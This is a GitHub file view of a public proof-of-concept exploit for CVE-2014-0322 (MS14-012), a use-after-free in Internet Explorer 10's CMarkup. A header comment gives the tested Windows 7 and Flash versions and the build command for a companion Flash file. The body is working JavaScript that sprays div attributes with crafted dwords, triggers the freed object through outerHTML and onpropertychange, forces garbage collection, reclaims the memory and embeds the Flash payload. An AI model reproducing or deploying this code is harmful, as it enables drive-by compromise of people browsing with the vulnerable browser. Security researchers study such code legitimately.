-
Notifications
You must be signed in to change notification settings - Fork 15
/
Copy pathCVE-2014-0322.html
111 lines (91 loc) · 2.34 KB
/
CVE-2014-0322.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
<!--
MS14-012 Internet Explorer CMarkup Use-After-Free
Vendor Homepage: http://www.microsoft.com
Version: IE 10
Date: 2014-03-31
Exploit Author: Jean-Jamil Khalife
Tested on: Windows 7 SP1 x64 (fr, en)
Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)
Home: http://www.hdwsec.fr
Blog : http://www.hdwsec.fr/blog/
MS14-012 / CVE-2014-0322
Generation:
c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as
-->
<html>
<head>
</head>
<body>
<script>
var g_arr = [];
var arrLen = 0x250;
function dword2data(dword)
{
var d = Number(dword).toString(16);
while (d.length < 8)
d = '0' + d;
return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
}
function eXpl()
{
var a=0;
for (a=0; a < arrLen; a++) {
g_arr[a] = document.createElement('div');
}
// Build a new object
var b = dword2data(0x19fffff3);
while (b.length < 0x360)
{
// mov eax,dword ptr [esi+98h]
// ...
// mov eax,dword ptr [eax+8]
// and dword ptr [eax+2F0h],0FFFFFFBFh
if (b.length == (0x98 / 2))
{
b += dword2data(0x1a000010);
}
// mov ecx,dword ptr [edx+94h]
// mov eax,dword ptr [ecx+0Ch]
else if (b.length == (0x94 / 2))
{
b += dword2data(0x1a111111);
}
// mov eax,dword ptr [edx+15Ch]
// mov ecx,dword ptr [eax+edx*8]
else if (b.length == (0x15c / 2))
{
b += dword2data(0x42424242);
}
else
{
b += dword2data(0x19fffff3);
}
}
var d = b.substring(0, ( 0x340 - 2 )/2);
// trigger
try{
this.outerHTML=this.outerHTML
}
catch(e){
}
CollectGarbage();
// Replace freed object
for (a=0; a < arrLen; a++)
{
g_arr[a].title = d.substring(0, d.length);
}
}
// Trigger the vulnerability
function trigger()
{
var a = document.getElementsByTagName("script");
var b = a[0];
b.onpropertychange = eXpl;
var c = document.createElement('SELECT');
c = b.appendChild(c);
}
</script>
<embed src=AsXploit.swf width="10" height="10"></embed>
</body>
</html>